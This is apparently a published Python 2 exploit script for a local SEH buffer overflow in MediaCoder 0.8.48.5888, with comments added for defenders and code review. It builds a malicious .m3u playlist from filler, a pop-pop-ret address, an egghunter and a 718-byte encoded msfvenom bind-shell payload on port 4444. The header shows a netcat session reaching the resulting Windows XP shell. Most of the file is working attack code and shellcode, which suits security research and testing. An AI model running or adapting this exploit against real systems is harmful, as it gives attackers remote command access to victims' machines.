#!/usr/bin/python
#
# October 2017 | github.com/rafaveira3
#
# MediaCoder 0.8.48.5888 - Local Buffer Overflow (SEH) (Using Egghunter)
#
# How I tested it:
# - Windows XP SP3 and Kali.
# - Download the vulnerable service on Windows XP (WARNING! THIS IS A VULNERABLE SERVICE)
# - https://www.exploit-db.com/apps/88879396a7103d9a401d05f5cec9bcae-MediaCoder-0.8.48.5888.exe
#
# PoC:
# Windows XP:
# - Install MediaCoder 0.8.48.5888 (next -> next -> finish)
# C:\Python27>python.exe exploit-mediacoder.py
# Exploit has been created!
# C:\Python27>
# - Open cmd.exe and type : netstat -ano | find ":4444"
# - Right click exploit.m3u -> Open With... MediaCoder
# Kali:
# root@kali:~# nc -nv 10.10.0.20 4444
# (UNKNOWN) [10.10.0.20] 4444 (?) open
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
#
# C:\Program Files\MediaCoder>
#
#
# Disclaimer: PLEASE! This is for research purposes only, and should only be used on authorized systems.
# Accessing a computer system or network without authorization or explicit permission is illegal.
#
# Infos:
# - pattern_create + pattern_offset = 365
# - pop pop ret found using mona at 0x64f010b2 of swscale-3.dll (SafeSEH:False)
# - short jmp 54 bytes back opcode: \xEB\xCA
# - egghunter generated with mona (egg r4f4)
# - shellcode generated with msfvenom
from struct import pack
# NOTE: Python 2 only. `print` as a statement and `raw_input` below do not
# exist in Python 3, and Python 2 `str` literals are byte strings, which is
# what lets the "\x.." escapes below be written to the file as raw bytes.
# `pack` (imported above) is never used in this script.
#
# Defender's view: the artefact this script writes is a single .m3u entry
# that starts with "http://" and then runs to well over a kilobyte of filler,
# addresses and encoded payload (7 + 309 + 10 + 32 + 10 + 4 + 4 + 8 + 718
# bytes). Per the header, the overflow is triggered simply by opening that
# playlist in the 0.8.48.5888 build, so removing/patching that build is the
# mitigation, and a playlist entry far longer than any plausible URL is the
# on-disk observable.

# nSEH component: the 2-byte short jump the header describes as landing 54
# bytes back, i.e. inside the NOP sled around the egghunter in `junk` below.
jmp = "\xEB\xCA"
# Size 32 Bytes
# Egg = r4f4
# mona-generated egghunter (see header). The tag "r4f4" is embedded in it as
# \x72\x34\x66\x34, and the same tag is written twice immediately before
# `shellcode` in `junk` below.
egghunter = "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8\x72\x34\x66\x34\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7"
# msfvenom -a x86 --platform Windows -p windows/shell_bind_tcp LPORT=4444 -f python -e x86/alpha_mixed
# Size = 718 bytes
# Encoded payload emitted by the msfvenom command above: a bind shell on
# TCP 4444, which is the port the header's netstat / nc steps check for.
# Opaque bytes; not meant to be edited by hand.
shellcode = ""
shellcode += "\x89\xe7\xdb\xc9\xd9\x77\xf4\x5f\x57\x59\x49\x49\x49"
shellcode += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
shellcode += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
shellcode += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += "\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x38\x68\x6f"
shellcode += "\x72\x77\x70\x53\x30\x67\x70\x71\x70\x6c\x49\x39\x75"
shellcode += "\x54\x71\x4b\x70\x35\x34\x4c\x4b\x76\x30\x74\x70\x4e"
shellcode += "\x6b\x43\x62\x36\x6c\x4e\x6b\x63\x62\x62\x34\x6c\x4b"
shellcode += "\x51\x62\x57\x58\x36\x6f\x6c\x77\x32\x6a\x76\x46\x55"
shellcode += "\x61\x6b\x4f\x6c\x6c\x45\x6c\x50\x61\x53\x4c\x44\x42"
shellcode += "\x66\x4c\x45\x70\x6a\x61\x48\x4f\x34\x4d\x56\x61\x59"
shellcode += "\x57\x58\x62\x6a\x52\x42\x72\x52\x77\x4e\x6b\x46\x32"
shellcode += "\x62\x30\x6e\x6b\x32\x6a\x65\x6c\x6c\x4b\x32\x6c\x52"
shellcode += "\x31\x44\x38\x4b\x53\x70\x48\x56\x61\x48\x51\x46\x31"
shellcode += "\x4c\x4b\x56\x39\x67\x50\x37\x71\x4b\x63\x4c\x4b\x53"
shellcode += "\x79\x72\x38\x4d\x33\x34\x7a\x62\x69\x6c\x4b\x36\x54"
shellcode += "\x6e\x6b\x73\x31\x5a\x76\x55\x61\x4b\x4f\x6e\x4c\x6b"
shellcode += "\x71\x6a\x6f\x64\x4d\x47\x71\x58\x47\x45\x68\x69\x70"
shellcode += "\x51\x65\x4c\x36\x56\x63\x51\x6d\x39\x68\x57\x4b\x51"
shellcode += "\x6d\x37\x54\x74\x35\x59\x74\x31\x48\x6e\x6b\x76\x38"
shellcode += "\x67\x54\x37\x71\x4e\x33\x65\x36\x4e\x6b\x54\x4c\x52"
shellcode += "\x6b\x4e\x6b\x32\x78\x37\x6c\x45\x51\x49\x43\x6e\x6b"
shellcode += "\x54\x44\x4e\x6b\x43\x31\x58\x50\x6e\x69\x31\x54\x66"
shellcode += "\x44\x54\x64\x53\x6b\x33\x6b\x43\x51\x50\x59\x42\x7a"
shellcode += "\x33\x61\x79\x6f\x59\x70\x71\x4f\x61\x4f\x51\x4a\x4c"
shellcode += "\x4b\x42\x32\x68\x6b\x6e\x6d\x43\x6d\x55\x38\x30\x33"
shellcode += "\x30\x32\x35\x50\x73\x30\x52\x48\x70\x77\x73\x43\x36"
shellcode += "\x52\x33\x6f\x51\x44\x50\x68\x70\x4c\x34\x37\x64\x66"
shellcode += "\x36\x67\x4b\x4f\x39\x45\x4d\x68\x7a\x30\x56\x61\x63"
shellcode += "\x30\x57\x70\x56\x49\x6a\x64\x72\x74\x56\x30\x65\x38"
shellcode += "\x47\x59\x4f\x70\x70\x6b\x63\x30\x4b\x4f\x4a\x75\x73"
shellcode += "\x5a\x54\x48\x61\x49\x30\x50\x79\x72\x4b\x4d\x43\x70"
shellcode += "\x56\x30\x51\x50\x36\x30\x72\x48\x49\x7a\x34\x4f\x49"
shellcode += "\x4f\x69\x70\x49\x6f\x78\x55\x6a\x37\x75\x38\x75\x52"
shellcode += "\x37\x70\x52\x31\x73\x6c\x6d\x59\x69\x76\x71\x7a\x36"
shellcode += "\x70\x30\x56\x72\x77\x61\x78\x48\x42\x6b\x6b\x64\x77"
shellcode += "\x63\x57\x49\x6f\x69\x45\x50\x57\x70\x68\x4d\x67\x4a"
shellcode += "\x49\x54\x78\x4b\x4f\x4b\x4f\x4e\x35\x50\x57\x71\x78"
shellcode += "\x42\x54\x6a\x4c\x35\x6b\x59\x71\x39\x6f\x4b\x65\x43"
shellcode += "\x67\x6c\x57\x70\x68\x31\x65\x52\x4e\x72\x6d\x45\x31"
shellcode += "\x39\x6f\x4e\x35\x63\x58\x65\x33\x72\x4d\x32\x44\x53"
shellcode += "\x30\x6e\x69\x6a\x43\x72\x77\x61\x47\x56\x37\x34\x71"
shellcode += "\x4c\x36\x32\x4a\x52\x32\x46\x39\x70\x56\x79\x72\x69"
shellcode += "\x6d\x61\x76\x4a\x67\x53\x74\x54\x64\x37\x4c\x45\x51"
shellcode += "\x66\x61\x4c\x4d\x32\x64\x66\x44\x66\x70\x59\x56\x35"
shellcode += "\x50\x77\x34\x31\x44\x76\x30\x36\x36\x63\x66\x66\x36"
shellcode += "\x37\x36\x42\x76\x42\x6e\x56\x36\x76\x36\x51\x43\x42"
shellcode += "\x76\x52\x48\x64\x39\x48\x4c\x77\x4f\x6c\x46\x49\x6f"
shellcode += "\x78\x55\x4e\x69\x6d\x30\x70\x4e\x50\x56\x67\x36\x39"
shellcode += "\x6f\x70\x30\x62\x48\x35\x58\x4d\x57\x57\x6d\x35\x30"
shellcode += "\x69\x6f\x58\x55\x6f\x4b\x48\x70\x6d\x65\x6d\x72\x31"
shellcode += "\x46\x51\x78\x6d\x76\x4d\x45\x4f\x4d\x4d\x4d\x49\x6f"
shellcode += "\x5a\x75\x55\x6c\x67\x76\x71\x6c\x34\x4a\x4b\x30\x6b"
shellcode += "\x4b\x39\x70\x50\x75\x65\x55\x6f\x4b\x57\x37\x54\x53"
shellcode += "\x71\x62\x32\x4f\x71\x7a\x55\x50\x31\x43\x4b\x4f\x39"
shellcode += "\x45\x41\x41"
# buf = junk + nSEH + SEH + junk
# Layout of `junk`, left to right:
#   "http://"                         7-byte prefix
#   "A"*309 + NOPs + egghunter + NOPs 361 bytes of filler; the egghunter is
#                                     wrapped in a 10-byte NOP sled on each
#                                     side so the short jump from nSEH has
#                                     slack to land in
#   "B"*2 + jmp                       4-byte nSEH slot
#   "\xb2\x10\xf0\x64"                SEH slot = 0x64f010b2, little-endian,
#                                     the pop/pop/ret in swscale-3.dll the
#                                     header names
#   "r4f4r4f4" + shellcode            doubled egg tag, then the 718-byte payload
# NOTE(review): 361 filler bytes put the SEH slot at offset 365 counted from
# after "http://"; that agrees with the header's pattern_offset only if the
# cyclic pattern was placed after the prefix — not confirmed here.
junk = "http://" + "A"*309 + "\x90"*10 + egghunter + "\x90"*10 + "B"*2 + jmp + "\xb2\x10\xf0\x64" + "r4f4r4f4" + shellcode
exploit = junk
# Writes the buffer to exploit.m3u in the current directory and waits for
# Enter before exiting.
# NOTE(review): `file` shadows the Python 2 builtin of that name; the bare
# `except:` also catches the KeyboardInterrupt raised by Ctrl-C during
# `raw_input`, reporting it as a generic error; and the message discards the
# underlying exception, so a permissions or path failure is indistinguishable
# from anything else. An `except IOError as e:` around only the open/write
# lines, printing `e`, would make failures diagnosable.
try:
    file= open("exploit.m3u",'w')
    file.write(exploit)
    file.close()
    raw_input("\nExploit has been created!\n")
except:
    print "There has been an Error"